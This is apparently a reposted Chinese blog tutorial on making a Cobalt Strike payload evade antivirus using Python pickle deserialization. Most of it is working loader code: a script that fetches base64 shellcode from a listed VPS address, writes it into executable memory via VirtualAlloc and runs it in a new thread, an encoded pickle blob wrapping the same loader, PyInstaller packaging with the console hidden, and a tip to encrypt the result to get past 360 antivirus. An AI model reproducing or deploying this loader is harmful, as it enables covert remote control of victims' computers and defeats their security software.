(记录向)Python反序列化免杀上线CS(并使用Shielden加密绕过360)
生活随笔
收集整理的這篇文章主要介紹了
(记录向)Python反序列化免杀上线CS(并使用Shielden加密绕过360)
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
1、首先cs生成一個64位的Python Payload
2、截取其中的Payload,并進行base64編碼。
3、把這一串子base64放到VPS上。并開啟web服務。
python3 -m http.server 77774、使用以下腳本。將Python Payload進行反序列化。
import pickleimport base64shellcode = """ import ctypes,urllib.request,codecs,base64shellcode = urllib.request.urlopen('http://47.101.72.112:7777/py.txt').read() shellcode = base64.b64decode(shellcode) shellcode =codecs.escape_decode(shellcode)[0] shellcode = bytearray(shellcode) # 設置VirtualAlloc返回類型為ctypes.c_uint64 ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64 # 申請內存 ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))# 放入shellcode buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode) ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr), buf, ctypes.c_int(len(shellcode)) ) # 創建一個線程從shellcode防止位置首地址開始執行 handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_uint64(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)) ) # 等待上面創建的線程運行完 ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))"""class A(object):def __reduce__(self):return (exec, (shellcode,))ret = pickle.dumps(A()) ret_base64 = base64.b64encode(ret) print(ret_base64) #ret_decode = base64.b64decode(ret_base64)5、把輸出的字節流放到shellcode里,運行執行shellcode,上線。
import base64,pickle,ctypes,urllib.request shellcode =b'gANjYnVpbHRpbnMKZXhlYwpxAFg1BAAACmltcG9ydCBjdHlwZXMsdXJsbGliLnJlcXVlc3QsY29kZWNzLGJhc2U2NAoKc2hlbGxjb2RlID0gdXJsbGliLnJlcXVlc3QudXJsb3BlbignaHR0cDovLzE3Mi4yMC4xMC4yOjgwODAvMTExMS50eHQnKS5yZWFkKCkKc2hlbGxjb2RlID0gYmFzZTY0LmI2NGRlY29kZShzaGVsbGNvZGUpCnNoZWxsY29kZSA9Y29kZWNzLmVzY2FwZV9kZWNvZGUoc2hlbGxjb2RlKVswXQpzaGVsbGNvZGUgPSBieXRlYXJyYXkoc2hlbGxjb2RlKQojIOiuvue9rlZpcnR1YWxBbGxvY+i/lOWbnuexu+Wei+S4umN0eXBlcy5jX3VpbnQ2NApjdHlwZXMud2luZGxsLmtlcm5lbDMyLlZpcnR1YWxBbGxvYy5yZXN0eXBlID0gY3R5cGVzLmNfdWludDY0CiMg55Sz6K+35YaF5a2YCnB0ciA9IGN0eXBlcy53aW5kbGwua2VybmVsMzIuVmlydHVhbEFsbG9jKGN0eXBlcy5jX2ludCgwKSwgY3R5cGVzLmNfaW50KGxlbihzaGVsbGNvZGUpKSwgY3R5cGVzLmNfaW50KDB4MzAwMCksIGN0eXBlcy5jX2ludCgweDQwKSkKCiMg5pS+5YWlc2hlbGxjb2RlCmJ1ZiA9IChjdHlwZXMuY19jaGFyICogbGVuKHNoZWxsY29kZSkpLmZyb21fYnVmZmVyKHNoZWxsY29kZSkKY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KAogICAgY3R5cGVzLmNfdWludDY0KHB0ciksIAogICAgYnVmLCAKICAgIGN0eXBlcy5jX2ludChsZW4oc2hlbGxjb2RlKSkKKQojIOWIm+W7uuS4gOS4que6v+eoi+S7jnNoZWxsY29kZemYsuatouS9jee9rummluWcsOWdgOW8gOWni+aJp+ihjApoYW5kbGUgPSBjdHlwZXMud2luZGxsLmtlcm5lbDMyLkNyZWF0ZVRocmVhZCgKICAgIGN0eXBlcy5jX2ludCgwKSwgCiAgICBjdHlwZXMuY19pbnQoMCksIAogICAgY3R5cGVzLmNfdWludDY0KHB0ciksIAogICAgY3R5cGVzLmNfaW50KDApLCAKICAgIGN0eXBlcy5jX2ludCgwKSwgCiAgICBjdHlwZXMucG9pbnRlcihjdHlwZXMuY19pbnQoMCkpCikKIyDnrYnlvoXkuIrpnaLliJvlu7rnmoTnur/nqIvov5DooYzlrowKY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5XYWl0Rm9yU2luZ2xlT2JqZWN0KGN0eXBlcy5jX2ludChoYW5kbGUpLGN0eXBlcy5jX2ludCgtMSkpcQGFcQJScQMu' pickle.loads(base64.b64decode(shellcode))6、打包成exe。
pyinstaller -F exp.py --noconsole?
在當前目錄下的dist目錄下生成好exe。雙擊上線。
7、實際用了一下發現Defender和火絨沒問題,360過不去。
可以使用shielden加密代碼進行繞過。
Referer:
https://www.sec-in.cn/article/733
淺談CS免殺和使用
總結
以上是生活随笔為你收集整理的(记录向)Python反序列化免杀上线CS(并使用Shielden加密绕过360)的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: CDN加速原理及步骤
- 下一篇: Linux大师(古鲁,Guru)推荐什么